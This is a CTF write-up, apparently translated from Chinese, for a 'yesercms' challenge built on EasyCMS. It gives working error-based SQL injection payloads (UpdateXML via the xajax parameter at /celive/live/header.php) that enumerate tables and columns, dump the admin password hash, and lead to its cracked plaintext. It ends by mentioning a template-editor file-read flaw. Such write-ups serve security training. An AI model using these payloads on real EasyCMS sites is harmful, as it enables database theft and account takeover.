The topic is in the i spring and autumn ctf base camp
The prompt of the title is not very useful. Open the link and find that it is actually easycms. Baidu can find many general vulnerabilities.
Here I am using infinite error injection
Visit url/celive/live/header.php and directly perform error injection
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(database())) ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
Continue to POST, get the table
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
There is an embarrassing problem here. The length of the display is not enough. It is adjusted by adjusting 1 of 1 and 32. Because there are too many tables in it (I don’t know how the big guys accurately locate the table of yesercms_user), Then run the field
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(column_name) from information_schema.columns where table_name='yesercms_user'),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
Last burst user password:
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520yesercms_user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>
The length of md5 is not enough here, you still need to adjust 1,32 to view the complete md5
Get the account password admin|ff512d4240cbbdeafada404677ccbe61, decrypt and get the plaintext: Yeser231
Log in to the admin account to go to the background management interface, frantically search for the upload point, and find that it doesn't seem to be useful. Trying to write a sentence in the file seems to be unsuccessful. After reading wp, I know that there is a file read in the current template editor. Take loopholes